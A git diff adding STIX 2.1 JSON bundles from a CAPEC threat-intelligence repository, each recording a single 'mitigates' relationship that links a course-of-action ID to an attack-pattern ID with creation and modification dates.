@@ -0,0 +1,21 @@ +{ + "id": "bundle--78648909-19d1-4cd4-823a-9d56e7a24a64", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0989752b-6aa5-43c2-afc2-0873faa1782e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0993c894-6271-447f-8111-2ee9ee88d8f1.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0993c894-6271-447f-8111-2ee9ee88d8f1.json new file mode 100644 index 0000000000000000000000000000000000000000..6b4defb5889961fd37c606f477da26899a4601e5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0993c894-6271-447f-8111-2ee9ee88d8f1.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--cef05ad6-cd90-4580-98e9-80e79c66384e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0993c894-6271-447f-8111-2ee9ee88d8f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c434bad9-76f4-48d5-8bb3-9c46c4c91696", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09b1f116-7e91-47fc-8238-758d20861790.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09b1f116-7e91-47fc-8238-758d20861790.json new file mode 100644 index 0000000000000000000000000000000000000000..dde03de20eb3d84bea7df591a16e480163cc8934 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09b1f116-7e91-47fc-8238-758d20861790.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--50abfbc3-7e74-40c8-b7c9-e9a47f584f5f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09b1f116-7e91-47fc-8238-758d20861790", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b77def1e-db69-4204-b59f-c9ba934af034", + "spec_version": "2.1", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04.json new file mode 100644 index 0000000000000000000000000000000000000000..d50f32713eab8d54cdd485f158c0c852a410a7da --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--8775737c-b5ec-40b0-a6b9-5a47a2a27cc1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cb6669ba-434f-4a26-8a80-93eacd1b68f0", + "spec_version": "2.1", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0.json new file mode 100644 index 0000000000000000000000000000000000000000..f5db54d482429aa26403df579a8c6d7f8b4db84b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--a8933892-2042-44a3-91fa-0e5d7acda24e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1.json new file mode 100644 index 0000000000000000000000000000000000000000..c2f8a7390a376598465963e921e57a84f0e349cf --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--b77fc97d-ba82-4d16-9022-d5869b69b662", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "spec_version": "2.1", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b609b9c-0b10-497b-b953-c1d279689017.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b609b9c-0b10-497b-b953-c1d279689017.json new file mode 100644 index 0000000000000000000000000000000000000000..610906c20909132f4ee8c65a0d8daa670864f08c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b609b9c-0b10-497b-b953-c1d279689017.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--48a0347b-8377-4dcd-94cf-66fcdb8d0e84", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b609b9c-0b10-497b-b953-c1d279689017", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5.json new file mode 100644 index 0000000000000000000000000000000000000000..d32c3ca883baf62c08ca0ae5fea8045ec9089b9a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--f12d3758-c2b9-41c5-9e70-cf4351531c36", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "spec_version": "2.1", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac.json new file mode 100644 index 0000000000000000000000000000000000000000..3c233e4c1a3c44b0c4571b1b3f024966f57e9830 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--c7ea2369-7747-49e9-bd1c-664eefc9b624", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4fec7a6-c3eb-48d8-b840-e4fad7c771c8", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b91c573-2031-4024-a179-a9a719c76d8a.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b91c573-2031-4024-a179-a9a719c76d8a.json new file mode 100644 index 0000000000000000000000000000000000000000..59d08630d8d0e2ead19339497a2cfe32a69036de --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b91c573-2031-4024-a179-a9a719c76d8a.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--ee9c8e47-8066-4518-b507-ed3731c070f5", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b91c573-2031-4024-a179-a9a719c76d8a", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8395680e-e9c6-4c7b-a94f-e5d4bdd9e5c0", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332.json new file mode 100644 index 0000000000000000000000000000000000000000..7949f06beb6f1d8476778abddd9573a48e57be0f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--9462bfb7-7362-4d47-ad26-74511342f899", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--638372f7-a792-4269-acd6-cfb761391fd6", + "spec_version": "2.1", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0.json new file mode 100644 index 0000000000000000000000000000000000000000..151d8becc91990cdb471ca1064e858f1efcc5a88 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--c5ec269d-7222-4177-b40d-b363ccbedcc1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0bdf0b48-2a70-4e88-bdb6-5b0ec07841b0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6bd7c5b7-b55f-4fac-a850-306a427dbaf8", + "spec_version": "2.1", + "target_ref": "attack-pattern--a7cc8cb3-8652-4669-893a-baaa21f7eb55", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0c786816-7b0c-4fe7-b657-7e339aea5498.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0c786816-7b0c-4fe7-b657-7e339aea5498.json new file mode 100644 index 0000000000000000000000000000000000000000..1ac34f62368640adfb6b8de3e01a2f99130ff4e3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0c786816-7b0c-4fe7-b657-7e339aea5498.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--1913b5f7-244d-4e64-90bc-6814d185b59b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0c786816-7b0c-4fe7-b657-7e339aea5498", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8cee0cf-4567-40f0-a8d6-0b1d71c03c27", + "spec_version": "2.1", + "target_ref": "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0cad5809-fa6b-4947-9d83-2c2e462c3f42.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0cad5809-fa6b-4947-9d83-2c2e462c3f42.json new file mode 100644 index 0000000000000000000000000000000000000000..431123ae062ee67fa6419766d9e0a152352098b7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0cad5809-fa6b-4947-9d83-2c2e462c3f42.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--d32d1c7f-8cf3-49a0-b5ec-22c50dc02ae8", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0cad5809-fa6b-4947-9d83-2c2e462c3f42", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0cbb16a5-1749-47ba-8527-a912d9298189.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0cbb16a5-1749-47ba-8527-a912d9298189.json new file mode 100644 index 0000000000000000000000000000000000000000..c2655dff2b05dd8e42d20eb1cdcf1b8385c42b72 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0cbb16a5-1749-47ba-8527-a912d9298189.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--f03126b5-6ec5-4ebe-9837-959d8e4dbc11", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0cbb16a5-1749-47ba-8527-a912d9298189", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6acfbc2d-97e0-447f-a683-2eebc9157e84", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d553a19-deeb-45df-b70d-71110b119c7c.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d553a19-deeb-45df-b70d-71110b119c7c.json new file mode 100644 index 0000000000000000000000000000000000000000..930a5673a7ecf1059d1f8f197036eff80a68ff58 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d553a19-deeb-45df-b70d-71110b119c7c.json 
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--b706486c-3a26-424f-8134-82c3b35b19f7",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0d553a19-deeb-45df-b70d-71110b119c7c",
+ "modified": "2021-06-24T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--b187831e-a53c-465d-b72f-49df78479e67",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d8b1972-e844-4991-a884-ca3e967a6e8d.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d8b1972-e844-4991-a884-ca3e967a6e8d.json
new file mode 100644
index 0000000000000000000000000000000000000000..0bd60fe3db18038c7f945534d2b5a3f117eaf807
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d8b1972-e844-4991-a884-ca3e967a6e8d.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--42d3c6fc-fa1e-4c55-8400-d0d4d1269444",
+ "objects": [
+ {
+ "created": "2015-11-09T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0d8b1972-e844-4991-a884-ca3e967a6e8d",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d9de774-ac83-4ac5-b974-c2cce00ad5f8.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d9de774-ac83-4ac5-b974-c2cce00ad5f8.json
new file mode 100644
index 0000000000000000000000000000000000000000..383b37355d8870126cce68c4c77db0095ef9ba6d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0d9de774-ac83-4ac5-b974-c2cce00ad5f8.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--9f519a28-3eac-4d99-a279-3194f396a8b8",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0d9de774-ac83-4ac5-b974-c2cce00ad5f8",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--50db6d91-2bb0-4ba5-a1f5-230d474e54ca",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--966f2983-596b-4e3b-b809-52f5576478c9",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0df6edf6-1157-43d2-8e50-4b6184d75a60.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0df6edf6-1157-43d2-8e50-4b6184d75a60.json
new file mode 100644
index 0000000000000000000000000000000000000000..3d308b29b43e7a7b25d5e81c1155d3f78a64fd38
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0df6edf6-1157-43d2-8e50-4b6184d75a60.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--a5f0aafd-c2a0-42d2-ac9a-f5aa532e0059",
+ "objects": [
+ {
+ "created": "2018-07-31T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0df6edf6-1157-43d2-8e50-4b6184d75a60",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--dd700183-d761-44fa-ac56-b6a20cc2cb3c",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0e96b154-0ac9-46dd-ada2-cfa26af58e40.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0e96b154-0ac9-46dd-ada2-cfa26af58e40.json
new file mode 100644
index 0000000000000000000000000000000000000000..cd5c4ff8cd2af27179c6fe120da340a4c3580663
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0e96b154-0ac9-46dd-ada2-cfa26af58e40.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--51de6da8-c2a3-4dce-af68-02853b843a23",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--0e96b154-0ac9-46dd-ada2-cfa26af58e40",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--dc7176bc-62c9-4fad-9036-5f5079477a3a.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--dc7176bc-62c9-4fad-9036-5f5079477a3a.json
new file mode 100644
index 0000000000000000000000000000000000000000..93526713bd1c43179d6c73ff9b925004155a8e10
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--dc7176bc-62c9-4fad-9036-5f5079477a3a.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--bc4e9450-361f-4291-b508-40a8fa462bc9",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--dc7176bc-62c9-4fad-9036-5f5079477a3a",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--d39d9ad3-ca67-4292-8e1c-279a1dd878b5",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--defdb513-7363-40a3-a5c5-41ca51464c89.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--defdb513-7363-40a3-a5c5-41ca51464c89.json
new file mode 100644
index 0000000000000000000000000000000000000000..b8e9ab86dba81c809894e4eb0f964af696286093
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--defdb513-7363-40a3-a5c5-41ca51464c89.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--a4c17514-e26e-4e2d-9397-0e537a5c73db",
+ "objects": [
+ {
+ "created": "2018-04-25T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--defdb513-7363-40a3-a5c5-41ca51464c89",
+ "modified": "2021-10-21T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--25c25dbf-033d-40de-8314-255ce51d1e3d",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--93bedd5b-70cc-48a0-a7c9-09b3800bd6bc",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e108a43f-d09d-41e1-8c5d-d88b4e285dc8.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e108a43f-d09d-41e1-8c5d-d88b4e285dc8.json
new file mode 100644
index 0000000000000000000000000000000000000000..8eecac22099458f38ed7c3198e95a1bfa2ef9482
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e108a43f-d09d-41e1-8c5d-d88b4e285dc8.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--f80492ad-fcff-4b11-920c-99f8b4c37c61",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--e108a43f-d09d-41e1-8c5d-d88b4e285dc8",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
